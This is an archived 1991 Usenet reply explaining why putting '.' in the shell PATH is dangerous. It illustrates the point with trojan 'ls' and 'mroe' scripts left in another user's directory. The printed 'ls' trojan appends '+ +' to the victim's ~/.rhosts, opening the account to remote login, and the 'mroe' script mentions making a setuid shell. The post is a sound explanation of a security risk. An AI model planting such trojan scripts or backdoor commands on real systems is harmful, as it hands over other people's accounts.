Path: utzoo!censor!geac!torsqnt!lethe!yunexus!ists!helios.physics.utoronto.ca!news-server.csri.toronto.edu!cs.utexas.edu!swrinde!zaphod.mps.ohio-state.edu!usc!rutgers!njin!princeton!tan.Princeton.EDU!pfalstad
From: pfalstad@tan.Princeton.EDU (Paul Falstad)
Newsgroups: comp.unix.shell
Subject: Re: Dot in PATH?
Message-ID: <5674@idunno.Princeton.EDU>
Date: 24 Jan 91 21:54:06 GMT
References: <1991Jan24.203423.25084@ux1.cso.uiuc.edu>
Sender: news@idunno.Princeton.EDU
Distribution: comp
Organization: The E. Henry Thripshaw Fan Club
Lines: 55

[ Is this in the FAQ? I forget... ]

jeffb@aquifer.las.uiuc.edu (Jeffrey Biesiadecki) wrote:
>In a recent flame war in alt.sources, it was said that it was a bad idea
>to have '.' in your $PATH variable (I use tcsh, or csh, probably this
>would apply for any shell).  What's wrong with doing this?

Let's say you have . first (VERY stupid).

% whoami
joeuser
% cd ~hacker/pub/funny
% ls
games    jokes
% logout

joeuser's account has just been broken into.  Where did it happen?

Let's say you have . last.

% cd ~hacker/pub/funny
% mroe jokes
mroe: Command not found.
% more jokes
Why did the chicken cross the road?
To get to the other side.
% logout

Happened again here.  Here's how:

% ls
games    jokes
% /bin/ls
games    jokes   l     ls    ls-l     moer     more    mroe     sl
% cat ./ls
#! /bin/csh -f
/bin/ls games jokes
echo + + >>~/.rhosts
% cat ./mroe
#! /bin/sh

  ... make suid shell of joeuser ...

case $SHELL in
*csh) echo mroe: Command not found. ;;
*) mroe: not found ;;
esac
%

Get the idea?

--
Paul Falstad, pfalstad@phoenix.princeton.edu PLink:HYPNOS GEnie:P.FALSTAD
"And she's always on about men following her.  I don't know what she
thinks they're going to do to her.  Vomit on her, Basil, says."-Flowery Twats